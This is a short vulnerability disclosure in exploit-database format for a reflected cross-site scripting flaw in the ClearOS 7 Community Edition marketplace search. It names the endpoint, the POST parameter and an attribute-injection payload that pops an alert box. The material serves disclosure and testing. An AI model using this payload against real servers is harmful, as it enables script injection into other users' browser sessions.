##################################################################################################################################
# Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting
# Date: 06.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.clearos.com
# Software Link:
http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso
# Version: 7
##################################################################################################################################

Introduction

ClearOS is a small business server operating system with server,
networking, and gateway functions. It is designed primarily for homes,
small, medium, and distributed environments. It is managed from a web based
user interface, but can also be completely managed and tuned from the
command line. ClearOS is available in a free Community Edition, which
includes available open source updates and patches from its upstream
sources. ClearOS is also offered in a Home and Business Edition which
receives additional testing of updates and only uses tested code for
updates. Professional tech-support is also available. Currently ClearOS
offers around 100+ different features which can be installed through the
onboard ClearOS Marketplace.

#################################################################################

XSS details

#################################################################################

XSS1 | Reflected

URL
https://192.168.2.104:81/app/marketplace/search

METHOD
Post

PARAMETER
search

PAYLOAD
' onmouseover=alert(1) '

#################################################################################